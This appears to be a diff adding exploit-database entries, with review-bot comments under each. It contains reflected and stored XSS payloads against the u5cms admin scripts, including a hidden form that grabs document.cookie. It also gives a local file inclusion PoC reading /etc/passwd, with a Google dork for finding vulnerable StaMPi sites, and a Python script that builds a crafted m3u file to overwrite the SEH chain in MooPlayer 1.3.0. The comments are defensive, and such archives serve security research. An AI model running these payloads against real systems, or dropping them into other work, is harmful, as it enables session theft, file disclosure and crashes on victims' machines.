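+GET /u5cms/u5admin/cookie.php?a=i2_l%00%3balert(5)//&b=d HTTP/1.1
+GET /u5cms/u5admin/cookie.php?a=i2_l&b=%3balert(6)// HTTP/1.1
+GET /u5cms/u5admin/copy.php?name=album"><img%20src%3da%20onerror%3dalert(7)> HTTP/1.1
+GET /u5cms/u5admin/delete.php?name=a"><img%20src%3da%20onerror%3dalert(8)> HTTP/1.1
+GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=../r/shortreference/shortreference_en.php.txt'%3balert(9)// HTTP/1.1
+GET /u5cms/u5admin/deletefile.php?typ=d'%3balert(10)//&name=shortreference&f=../r/shortreference/shortreference_en.php.txt HTTP/1.1
+GET /u5cms/u5admin/done.php?n=inserted%20test"><script>alert(11)</script> HTTP/1.1
+GET /u5cms/u5admin/editor.php?c=c"><script>alert(12)</script> HTTP/1.1
+POST /u5cms/u5admin/meta2.php?typ=a&uri=metai.php'%3balert(13)// HTTP/1.1
+GET /u5cms/u5admin/notdone.php?n=wrong%20name,%20not%20deleted%20<script>alert(14)</script> HTTP/1.1
+GET /u5cms/u5admin/rename2.php?name=valbum&newname=valbum'%3balert(15)//&typ=a HTTP/1.1
+GET /u5cms/u5admin/sendfile.php?name=shortreference&l=_frd"><script>alert(16)</script>&typ=d HTTP/1.1
+GET /u5cms/u5admin/characters.php?more=335&s=335"><script>alert(17)</script> HTTP/1.1
+Stored XSS:
+===========
+<html>
+<body>
+<form action="http://10.0.50.3/u5cms/u5admin/savepage.php" method="POST">
+<input type="hidden" name="page" value='ZSL"><script>alert(document.cookie);</script>' />
+<input type="hidden" name="view" value="d" />
+<input type="hidden" name="ishomepage" value="1" />
+<input type="hidden" name="hidden" value="0" />
+<input type="hidden" name="logins" value="" />
+<input type="hidden" name="title_d" value="Test" />
+<input type="hidden" name="desc_d" value="" />
+<input type="hidden" name="key_d" value="" />
+<input type="hidden" name="content_d" value="Tstz" />
+<input type="hidden" name="title_e" value="ZSL" />
+<input type="hidden" name="desc_e" value="llll" />
+<input type="hidden" name="key_e" value="qqq" />
+<input type="hidden" name="content_e" value="AllTheWay" />
+<input type="hidden" name="title_f" value="None" />
+<input type="hidden" name="desc_f" value="" />
+<input type="hidden" name="key_f" value="" />
+<input type="hidden" name="content_f" value="Aloha" />
+<input type="hidden" name="coco" value="1423010603" />
+<input type="submit" value="Submit form" />
+</form>
+</body>
+</html>
+--
+<html>
+<body>
+<form action="http://10.0.50.3/u5cms/u5admin/new2.php?typ=e" method="POST">
+<input type="hidden" name="name" value='"><img%20src%3da%20onerror%3dalert("XSS")>' />
+<input type="hidden" name="typ" value="e" />
+<input type="submit" value="Submit form" />
+</form>
+</body>
+</html>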
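Review bot: The stored-XSS form posting to `savepage.php` is hosted on a third-party page, yet the advisory does not say whether `savepage.php` needs an authenticated admin session or whether the `coco` field (its value looks like a Unix timestamp rather than a request token — unconfirmed) is checked; defenders need that to judge whether the stored vector is reachable cross-site or only by a logged-in editor. The reflected list mixes public `index.php` parameters with `u5admin/` scripts without marking which require login, and the descriptions of the parameters are left to the reader to infer from the requests. The remediation to state is contextual output encoding for every echoed parameter (HTML, attribute and JavaScript-string contexts are all represented here), and the advisory gives none.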

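--- a/platforms/php/webapps/36031.txt
+++ b/platforms/php/webapps/36031.txt
@@ -0,0 +1,11 @@
+# Exploit Title: StaMPi - Local File Inclusion
+# Google Dork: "Designed by StaMPi" inurl:fotogalerie.php
+# Date: 16/2/15
+# Author : e . V . E . L
+# Contact: waleed200955@hotmail.com
+PoC:
+http://site.com/path/fotogalerie.php?id=../../../../../../../../../../etc/passwd%00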
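Review bot: `# Date: 16/2/15` is later than this commit's date (2015-02-10) and disagrees with the 2015-02-09 recorded for 36031 in files.csv; the date should be corrected in one place or the other. The header gives no vendor, version or fix information and identifies the product only by a design credit, so a defender cannot tell which releases are affected or whether a fix exists; add `# Vendor Homepage:` and `# Version:` lines even if the value is "unknown". The PoC also does not show the line of fotogalerie.php that consumes `id`, so whether this is an include or a plain file read is unverified.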

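--- a/platforms/windows/dos/36022.py
+++ b/platforms/windows/dos/36022.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python
+##########################################################################################
+# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow POC
+# Date Discovered: 09-02-2015
+# Exploit Author: Samandeep Singh ( SaMaN - @samanL33T )
+# Vulnerable Software: Moo player 1.3.0
+# Software Link: https://mooplayer.jaleco.com/
+# Vendor site: https://mooplayer.jaleco.com/
+# Version: 1.3.0
+# Tested On: Windows XP SP3, Win 7 x86.
+##########################################################################################
+# -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+# After the execution of POC, the SEH chain looks like this:
+# 01DDF92C ntdll.76FF71CD
+# 01DDFF5C 43434343
+# 42424242 *** CORRUPT ENTRY ***
+# And the Stack
+# 01DDFF44 41414141 AAAA
+# 01DDFF48 41414141 AAAA
+# 01DDFF4C 41414141 AAAA
+# 01DDFF50 41414141 AAAA
+# 01DDFF54 41414141 AAAA
+# 01DDFF58 41414141 AAAA
+# 01DDFF5C 42424242 BBBB Pointer to next SEH record
+# 01DDFF60 43434343 CCCC SE handler
+# 01DDFF64 00000000 ....
+# 01DDFF68 44444444 DDDD
+# 01DDFF6C 44444444 DDDD
+# 01DDFF70 44444444 DDDD
+# And the Registers
+# EAX 00000000
+# ECX 43434343
+# EDX 76FF71CD ntdll.76FF71CD
+# EBX 00000000
+# ESP 01DDF918
+# EBP 01DDF938
+# ESI 00000000
+# EDI 00000000
+# EIP 43434343
+head="http://"
+buffer=10000
+junk="\x41" * 264
+nseh = "\x42" * 4
+seh = "\x43" * 4
+poc = head + junk + nseh + seh
+junk1 = "\x44"*(buffer-len(poc))
+poc += junk1
+file = "mooplay_poc.m3u"
+f=open(file,"w")
+f.write(head + poc);
+f.close();
+#SaMaN(@samanL33T)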
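Review bot: `file = "mooplay_poc.m3u"` shadows the Python 2 builtin `file`, and the open/write/close at the end carries stray semicolons and no context manager; `with open("mooplay_poc.m3u", "w") as f: f.write(head + poc)` does the same job without leaking the handle on a write error. The NOTES block documents the SEH chain, stack and registers after the crash but never says what `buffer=10000` represents or why the padding is computed as `buffer-len(poc)`, while the file is written as `head + poc` although `poc` already starts with `head`, so the emitted file's length and layout do not match what the variable names suggest; a one-line comment stating the intended file size would remove the ambiguity. For defenders the useful addition is the observation, already implied by the dump, that the crash is reached from an untrusted playlist file, so the player should not be used to open playlists from unknown sources until the vendor issues a fix.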